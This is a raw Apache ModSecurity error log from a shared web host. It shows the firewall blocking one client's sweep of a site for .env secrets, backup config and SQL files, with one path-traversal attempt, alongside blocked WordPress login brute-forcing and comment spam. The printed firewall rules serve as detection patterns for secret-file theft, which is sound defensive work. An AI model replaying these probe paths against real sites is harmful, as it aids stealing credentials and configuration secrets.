[Tue May 26 19:56:19.675874 2026] [security2:error] [pid 93868:tid 94286] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/papertrail/.env"] [unique_id "ahWti0qK9k_ZUB2Vp25bQgAAAas"]
[Tue May 26 19:56:19.839722 2026] [security2:error] [pid 93868:tid 94068] [remote 92.205.188.156:56674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWti0qK9k_ZUB2Vp25bQAABzxc"]
[Tue May 26 19:56:20.111227 2026] [security2:error] [pid 93868:tid 94088] [remote 135.181.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.181.135.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWti0qK9k_ZUB2Vp25bSQAB8CI"], referer: https://kingsclub.in/wp-login.php?action=register
[Tue May 26 19:56:20.510186 2026] [security2:error] [pid 93868:tid 94103] [remote 195.200.18.14:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "195.200.18.14" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWtjEqK9k_ZUB2Vp25bXAABlSo"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:56:20.510403 2026] [security2:error] [pid 93868:tid 94264] [client 195.200.18.14:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWtjEqK9k_ZUB2Vp25bXAABlSo"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:56:20.792933 2026] [security2:error] [pid 93868:tid 94236] [remote 92.205.188.156:56674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtjEqK9k_ZUB2Vp25bZgAB9XI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:56:20.845699 2026] [security2:error] [pid 93868:tid 94345] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtjEqK9k_ZUB2Vp25bWAAAAeY"]
[Tue May 26 19:56:20.862347 2026] [security2:error] [pid 93868:tid 94383] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/zimbra/config.xml"] [unique_id "ahWtjEqK9k_ZUB2Vp25bawAAAgw"]
[Tue May 26 19:56:20.922114 2026] [security2:error] [pid 93868:tid 94252] [remote 195.200.18.14:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "195.200.18.14" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWtjEqK9k_ZUB2Vp25bbAABxns"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:56:20.922292 2026] [security2:error] [pid 93868:tid 94313] [client 195.200.18.14:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWtjEqK9k_ZUB2Vp25bbAABxns"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:56:21.369320 2026] [security2:error] [pid 93868:tid 94336] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/heroku/.env"] [unique_id "ahWtjUqK9k_ZUB2Vp25bdgAAAd0"]
[Tue May 26 19:56:21.707872 2026] [security2:error] [pid 93868:tid 94269] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/old/debug.bak"] [unique_id "ahWtjUqK9k_ZUB2Vp25bfAAAAZo"]
[Tue May 26 19:56:21.725787 2026] [security2:error] [pid 93576:tid 93732] [client 51.77.74.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtjWDRMqfxdEDkoszd2QAAABQ"]
[Tue May 26 19:56:21.876648 2026] [security2:error] [pid 93868:tid 94267] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/APP/.env"] [unique_id "ahWtjUqK9k_ZUB2Vp25bggAAAZg"]
[Tue May 26 19:56:22.382063 2026] [security2:error] [pid 93868:tid 94318] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sitestatic/.env"] [unique_id "ahWtjkqK9k_ZUB2Vp25bjAAAAcs"]
[Tue May 26 19:56:22.550726 2026] [security2:error] [pid 93868:tid 94316] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/db/debug.bak"] [unique_id "ahWtjkqK9k_ZUB2Vp25bjwAAAck"]
[Tue May 26 19:56:22.870488 2026] [security2:error] [pid 93868:tid 94311] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtjkqK9k_ZUB2Vp25bjgAAAcQ"]
[Tue May 26 19:56:22.932926 2026] [security2:error] [pid 93868:tid 94296] [client 135.181.117.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWtjEqK9k_ZUB2Vp25bYQABtS0"], referer: https://kingsclub.in/wp-login.php?action=register
[Tue May 26 19:56:23.057319 2026] [security2:error] [pid 93868:tid 94334] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/misc/.env"] [unique_id "ahWtj0qK9k_ZUB2Vp25bmQAAAds"]
[Tue May 26 19:56:24.074820 2026] [security2:error] [pid 93868:tid 94258] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sidebar.php.bak"] [unique_id "ahWtkEqK9k_ZUB2Vp25bsQAAAY8"]
[Tue May 26 19:56:24.412080 2026] [security2:error] [pid 93868:tid 94283] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test/integration/env-config/app/.env"] [unique_id "ahWtkEqK9k_ZUB2Vp25btQAAAag"]
[Tue May 26 19:56:24.470611 2026] [security2:error] [pid 93868:tid 94080] [remote 119.18.52.246:51834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtkEqK9k_ZUB2Vp25btAABpx4"]
[Tue May 26 19:56:24.581510 2026] [security2:error] [pid 93868:tid 94299] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.docker/.env"] [unique_id "ahWtkEqK9k_ZUB2Vp25btwAAAbg"]
[Tue May 26 19:56:25.021266 2026] [security2:error] [pid 93868:tid 94078] [remote 119.18.52.246:51834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtkUqK9k_ZUB2Vp25bxwABuh0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:56:25.962229 2026] [security2:error] [pid 93868:tid 94338] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtkUqK9k_ZUB2Vp25b0wAAAd8"]
[Tue May 26 19:56:26.447054 2026] [security2:error] [pid 93868:tid 94339] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/..%2F..%2F..%2F..%2F..%2Fvar/www/html/.env"] [unique_id "ahWtkkqK9k_ZUB2Vp25b6gAAAeA"]
[Tue May 26 19:56:26.615492 2026] [security2:error] [pid 93868:tid 94264] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/store/.env"] [unique_id "ahWtkkqK9k_ZUB2Vp25b7gAAAZU"]
[Tue May 26 19:56:27.122818 2026] [security2:error] [pid 93868:tid 94269] [client 185.177.72.53:53232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sentry/.env"] [unique_id "ahWtk0qK9k_ZUB2Vp25b_AAAAZo"]
[Tue May 26 19:56:27.616942 2026] [security2:error] [pid 93868:tid 94366] [client 66.249.64.161:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWtk0qK9k_ZUB2Vp25cCAAAAfs"]
[Tue May 26 19:56:28.484040 2026] [security2:error] [pid 93576:tid 93767] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/slack/.env"] [unique_id "ahWtlGDRMqfxdEDkoszeEAAAADc"]
[Tue May 26 19:56:28.652066 2026] [security2:error] [pid 93576:tid 93835] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/inventory-app/server/.env"] [unique_id "ahWtlGDRMqfxdEDkoszeEwAAAHs"]
[Tue May 26 19:56:28.806738 2026] [security2:error] [pid 93868:tid 94368] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtlEqK9k_ZUB2Vp25cGgAAAf0"]
[Tue May 26 19:56:29.161051 2026] [security2:error] [pid 93576:tid 93823] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/tmp/settings.bak"] [unique_id "ahWtlWDRMqfxdEDkoszeHQAAAG8"]
[Tue May 26 19:56:30.183321 2026] [security2:error] [pid 93576:tid 93712] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/db/wp-config.bak"] [unique_id "ahWtlmDRMqfxdEDkoszeLAAAAAA"]
[Tue May 26 19:56:30.692259 2026] [security2:error] [pid 93576:tid 93728] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/functions.php~"] [unique_id "ahWtlmDRMqfxdEDkoszeMwAAABA"]
[Tue May 26 19:56:30.859664 2026] [security2:error] [pid 93576:tid 93713] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tenants/.env"] [unique_id "ahWtlmDRMqfxdEDkoszeOQAAAAE"]
[Tue May 26 19:56:31.304451 2026] [security2:error] [pid 93576:tid 93825] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtlmDRMqfxdEDkoszePAAAAHE"]
[Tue May 26 19:56:31.414188 2026] [security2:error] [pid 93868:tid 94144] [remote 213.171.208.232:48744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtl0qK9k_ZUB2Vp25cSAACAkA"]
[Tue May 26 19:56:31.422002 2026] [security2:error] [pid 93868:tid 94143] [remote 103.95.119.103:50050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtl0qK9k_ZUB2Vp25cRwABkT8"]
[Tue May 26 19:56:31.679365 2026] [security2:error] [pid 93868:tid 94153] [remote 213.171.208.232:48744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtl0qK9k_ZUB2Vp25cVwABpUU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:56:31.878642 2026] [security2:error] [pid 93576:tid 93814] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v4/.env"] [unique_id "ahWtl2DRMqfxdEDkoszeXQAAAGY"]
[Tue May 26 19:56:32.725179 2026] [security2:error] [pid 93576:tid 93722] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/angular-app/backend/.env"] [unique_id "ahWtmGDRMqfxdEDkoszeaAAAAAo"]
[Tue May 26 19:56:33.061969 2026] [security2:error] [pid 93576:tid 93731] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ci/config/.env"] [unique_id "ahWtmWDRMqfxdEDkoszebQAAABM"]
[Tue May 26 19:56:33.400703 2026] [security2:error] [pid 93576:tid 93740] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.1.backup"] [unique_id "ahWtmWDRMqfxdEDkoszedQAAABw"]
[Tue May 26 19:56:33.901356 2026] [security2:error] [pid 93868:tid 94361] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtmUqK9k_ZUB2Vp25cmQAAAfY"]
[Tue May 26 19:56:34.417566 2026] [security2:error] [pid 93576:tid 93718] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/index.sql"] [unique_id "ahWtmmDRMqfxdEDkoszegwAAAAY"]
[Tue May 26 19:56:36.535738 2026] [security2:error] [pid 93868:tid 94361] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtnEqK9k_ZUB2Vp25c7QAAAfY"]
[Tue May 26 19:56:37.122520 2026] [core:crit] [pid 93868:tid 94262] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
